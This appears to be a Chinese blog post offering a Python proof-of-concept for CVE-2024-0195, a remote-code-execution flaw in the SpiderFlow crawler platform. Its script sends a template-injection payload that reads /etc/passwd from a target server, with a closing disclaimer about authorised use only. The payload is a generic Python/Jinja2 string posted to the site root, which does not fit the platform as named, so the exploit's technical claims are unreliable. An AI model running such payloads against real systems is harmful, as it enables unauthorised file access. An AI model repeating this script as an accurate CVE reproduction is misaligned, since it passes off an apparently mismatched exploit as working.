SpiderFlow爬虫平台 前台RCE漏洞复现(CVE-2024-0195）

复现CVE-2024-0195漏洞，需要具备以下条件：

1. 安装有Python环境。
2. 安装requests库。
3. 对SpiderFlow平台有基本的了解。

以下是一个简单的Python脚本，用于尝试利用该RCE漏洞：

import requests
 
# 目标SpiderFlow平台的URL
url = "http://your-spider-flow-platform-url"
 
# 利用RCE漏洞的payload
payload = """
{% set my_dict = {'k1': 'v1', 'k2': 'v2'} %}
{{ [].__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
"""
 
headers = {
    'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': 'session=your-spider-flow-session-cookie'
}
 
# 尝试发送带有Jinja2模板注入的请求
response = requests.post(url, data=payload, headers=headers)
 
if response.status_code == 200:
    print("请求成功，应答如下：")
    print(response.text)
else:
    print("请求失败，状态码：", response.status_code)

请注意，这个脚本仅用于验证漏洞存在，不得用于未授权访问他人计算机或其他非法目的。实际利用时应确保遵守所有适用的法律法规。